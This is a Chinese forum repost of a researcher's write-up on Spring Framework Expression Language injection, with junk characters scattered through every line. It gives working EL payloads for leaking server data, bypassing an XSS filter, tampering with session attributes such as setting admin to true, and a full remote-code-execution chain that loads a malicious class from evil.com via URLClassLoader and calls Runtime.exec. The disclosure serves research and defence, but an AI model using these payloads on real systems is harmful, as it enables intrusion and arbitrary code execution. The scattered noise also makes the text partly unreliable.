Remote Code with
5 O1 O) V( i/ z$ D! [Expression Language Injection
. [, {, r- S+ I5 A& JSpring Framework脆弱性—DanAmodio
, E* \/ T( A% P" ]全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
: k- j, N% h* j; v. z% q- l可能会存在风险。
/ S6 Z4 a- M# `* l8 g" Z( I在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的) r, U/ ~5 S( C! M. I% i
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
3 C5 J7 U" [8 U1 t, o以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
( G; W; i5 W$ ^6 V% d9 U以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前: J, u/ x: Y Q4 J% a6 {
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
0 m) o* ?- S* O! O由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但4 ~9 w K8 b# U2 g# Y3 W% R
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
4 p9 U* a7 D( x6 z. O7 x本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。: k2 O7 ~) W4 v k
这些版本不支持禁用double EL resolution.3 T- r, N* O5 j1 t( H: P$ h
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含/ i" C* R. m% o. n* N" U
EL2.2容器上可能进行远程代码执行。8 H) l# N! N: C% O
这是一个原始信息泄露的攻击例子:; g0 Y+ [8 b* I; R+ t) q* z6 Q
请求:! L/ [! P) f Z+ Q& l
ttp://vulnerable.com/foo?message=${applicationScope}2 _7 _! |% V' z8 e
到达以下内容页面:7 T$ k5 ~; k* ?- R% h
结果将输出一些包含内部服务器信息calsspath 和本地工作目录
1 A% m. y- p( P' s$ L" g# w& m7 V你也可以做一些其他事情,如这样:
8 P; H. ~( C7 U/ t3 `& d/ `${9999+1}2 O" z6 P* M7 s( U) ^2 i+ G
还可以访问session 对象和beans/ S( _ p& e+ ^
${employee.lastName}4 u( q& H' h, L
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是4 Q7 N1 i, ]4 P1 w4 D
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东" P0 X% |2 q! T. p' G. M
西,比如XSS.6 W% I m( q( a e
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
4 J. Y# e- I% Z" ]5 X/ c突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
( N6 e6 B4 Y0 V7 r- T呢?”
4 Z, ^! g3 z" m5 K9 V因此,我尝试巳缦拢�: T7 D z7 o. u# ^1 v
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
! B) g0 }( C7 V* K7 M6 W9 m; LP0 \3 N* c2 O; H0 W' L2 f! M
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
* b+ p# d9 |$ Y回的文本被插入进了spring:message 标签。 r, r3 q$ r0 o8 D6 M
这里是一个最终绕过过滤的实例:
- ~9 H' `' Q) J1 O! q" Z+ fhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ+ {+ d2 {7 o/ r4 n) {
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为' |# W( Y# Y5 P' C
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
2 a1 A- r$ V9 E/ X3 `: D8 `经过一番研究,我学习到EL2.2 增加了方法调用。: J$ l7 E6 V9 L9 m1 l
我写了一个快速测试应用程序代码并且检测一些功能
* w6 @4 I' m3 X7 {- Y- D${pageContext.request.getSession().setAttribute(“account”,”123456″)}
o. G9 P2 T/ h8 e# t8 y% u${pageContext.request.getSession().setAttribute(“admin”,true)}
* b* F4 C7 [3 p2 [# { T- l8 e好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的0 n4 q- h; B. M5 M2 y. c& L8 X
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?* c2 ]6 j% Z9 P. X3 b3 D4 Y/ ]
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
3 H6 F3 R3 s/ r' S7 Z3 B# X% L“, 1234)}* z& N) E6 [+ V8 `6 q, G
${“”.getClass().forName(“java.lang.Runtime”)}
4 Z: j5 ^1 }2 M" _$ F8 A- r哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不8 [+ H8 d( A/ E2 n8 O
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
" a! U, H( Y+ a) ^- N' G数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
0 w6 Y- h8 \4 S( Y1 w3 Y8 d* e一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
2 T' [8 P1 G+ M; J+ l方法签名invoke(Object obj, Object„ args)2 C" S& e5 j; ^+ k5 Z& j, O; ]
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问; J; ~8 b8 M2 z% F! u; e
题,以让它可以工作起来。7 l. l0 a) m: l* O
漏洞利用:
6 ]! b9 g1 Y+ z9 a* G! _我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
1 }0 }9 N* Z2 o# w% z+ b希望你们中的一些JAVA奇才告诉我我是如此的可笑。
! R, ?* ]4 G* w8 `这里有一些我试过的失败的用例,为了试图让它工作的用例:
& L H( e6 ]. x 写文件到文件系统
, T2 B5 } Z+ Z" U 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.( ?- Y$ n5 S5 \! Y/ b. c
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
, t' J% K! O, m; l$ ^2 ^${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
. R! r2 E. T- [# v& O5 Xjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
6 `" L$ X p& z" {+ Iorg.springframework.expression.spel.standard.SpelExpressionParser not found
1 |. p5 |4 Q& h. `$ N% A4 k5 sby/ S. B7 A, s9 C F5 s, L
org.glassfish.web.javax.servlet.jsp [194].* b, Y0 g5 _1 Y; q
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
+ U: N) [3 g0 l 利用反射来创建一个新的Runtime(and watch the world burn)
6 R% j/ S" g( e+ s" Z${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName! V9 S) c8 @9 B: V9 V% o, z* n
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}6 {: J4 [ I/ g5 H# }
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}9 J$ V8 D9 @( ? f; u/ }
使用java.lang.ProcessBuilder; j/ y+ L' D" }$ r9 m. O; b
用表达式语言来评估表达式语言
* Z9 O* D* w2 _. mExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
" g" P$ S7 w9 I" a' `0 x${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request# D( H. s* w' P% f. _& }+ Y0 p* B
“,”".getClass(),null)}; i7 X7 |) ^' X p$ c
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
: S7 m4 _0 S8 k/ O9 e7 [我在使用一个空数组通过Method.invoke()时失败了很多次
2 [. q4 a! V& B! h* v“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
5 a; V) Y8 l) \5 N4 m% a4 e.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A/ r1 S3 l* R* m' Y; V0 n
rrayList”).newInstance().toArray())
1 @# W0 e4 P& V9 kjava.lang.IllegalArgumentException: wrong number of arguments: N( N( e8 w1 o4 f* _/ l9 Z( {
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可1 o1 f G" k" Z' s
以创建一个恶意class文件并且指向类装载器.
3 D- C. L, U5 Z& E我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
+ \% [8 C1 n ^5 o+ Gpublic class Malicious {
! ~2 [. T& E" F6 G! Epublic Malicious() {2 J$ x. n( Z$ @: Y9 {' k
try {
" W& L, C; L4 Q, J( ~3 c) g6 a0 rjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac' D. v1 V, X% ]1 Z
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win) G* z3 E$ ^6 \& _- r) ]1 D
} catch (Exception e) {
( t q8 j+ X( p+ |}
5 q/ C% m$ Z, M$ d/ i6 f8 G}
, x* G7 u1 r, @) `3 G F- z我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
' }' f( |+ c$ |9 _% d: w话中,因此它可以被使用.
/ D$ g3 F, H3 ^* S" W9 ?: q4 q${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName" x5 o2 O; }$ q. x" G1 H
(“java.util.ArrayList”).newInstance())}% e; [/ N6 [) d
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
) T7 U; T4 f. i8 Q3 B( t7 @2 v一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和- n' A, Q" m7 ~3 d; [8 E
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个 w# f1 A8 n/ E. {! ~% a& B
我们可以调用的create(string)方法,然后转换对一个URL对象。1 j1 f1 k# N& H5 v5 ?. {9 x0 g
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
& Y0 V: a8 i$ @! i1 @3 I. t yere/malicious/classfile/is/located/”).toURL())}
/ L, @: D5 ?7 V# i然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,/ D% E) D$ A: _+ e& G4 R' b) _
恶意类文件被装载并创建,触发远程代码.- [4 {: {0 X( ~4 u" @* ]
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte. w- I0 }" `% u, z! A9 d7 H U
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
2 N% V: ~& l3 k/ H2 T% I/ S! T, ^8 HgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
' @& I( O" D# P$ D e, L1 q+ I()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对